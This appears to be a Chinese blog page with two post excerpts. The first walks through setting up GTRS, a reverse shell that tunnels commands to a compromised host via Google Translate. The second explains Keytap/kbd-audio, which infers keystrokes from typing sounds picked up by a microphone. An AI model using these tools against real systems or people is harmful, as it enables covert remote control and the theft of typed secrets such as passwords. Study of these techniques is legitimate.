关于GTRS

Github GTRS – Google Translator Reverse Shell

GTRS将Googel Translator作为代理,向感染主机发送任意指令(实测效果并不是很好,有些指令会让被侵入机(或是脚本)卡住)。

项目只包含一个bash和一个python脚本。

环境

  • 两台VPS,均安装Ubuntu16.04
  • python 2.7.12

额外需要

  • 一个域名(需要解析到控制机上)
    • 可在 Freenom 注册免费域名

使用步骤

  1. 在两台机器上clone GTRS
    git clone https://github.com/mthbernardes/GTRS
  2. 两台机器安装依赖libxml2-utils(macOS不需要此步骤)
    apt-get install libxml2-utils
  3. 先在控制机上运行server.py
    python2 server.py

    运行后会输出当前使用的端口,以及一个uuid(在被控制机上运行脚本需要注意,每次执行server.py其uuid都会改变)

  4. 切换到另外一台机器(作为被控制机),运行client.sh
    bash client.sh [your server VPS domain] [your generated uuid]

  5. 如果运行成功,控制机会出现“$”字符,此时就可以执行指令了

Continue reading “开源项目GTRS侵入主机”

本文包括Keytap项目的简单介绍以及kbd-audio的使用

关于Keytap

据项目开发人讲,此项目受关注的起因是某个著名开发者注意到了他在Hacker News上的一个回复

Github kbd-audio

以下个人理解来自 Keytap 官方项目说明 Keytap: description and some random thoughts

kbd-audio工具是Keytap项目的实现,可以通过麦克风捕捉键盘(一个键)敲击时产生的声音,并且根据这个声音推测此次敲击的键,可以理解为机器听觉。

它实现的流程是这样的:

  1. 首先需要一个(kbd-audio中后缀为.kbd)的学习数据(training data)。
    • 在真正进行键位预测前,需要一些 已知输入键的声音样本,来让程序了解什么声音对应什么键。
    • 学习数据的生成并不是简单的映射【键位】和【录音】,开发者做了一些复杂的处理。
  2. 生成一个预测模型。
  3. 键盘按键检测。
  4. 对检测到的击键进行键位预测。

学习数据的生成

现阶段两个击键间的声音会被去除,只保留每个击键前后75-100毫秒的声音样本。因为硬件或软件的原因,键盘被按下 到 程序触发击键事件中间会有随机的延迟,这个延迟是不固定的。

作者以他的键盘的G键为例,展示了其波形图:

从图中可以看出,在放开键的时刻同样会生成波峰,而Keytap会直接放弃松开键时的波峰。也许在这个部分也可以提取到一些有用的信息,但是为了简化,Keytab忽略了这部分数据。最后,生成的学习数据长这样:

75毫秒的区间会对输入速度有很大的限制,如果输入速度过快,不同键的学习数据会混在一起。

一个键可以重复输入,输入次数越多预测效果越好,程序会结合多次输入来减轻噪音干扰。

Continue reading “开源项目 Keytap(kbd-audio)”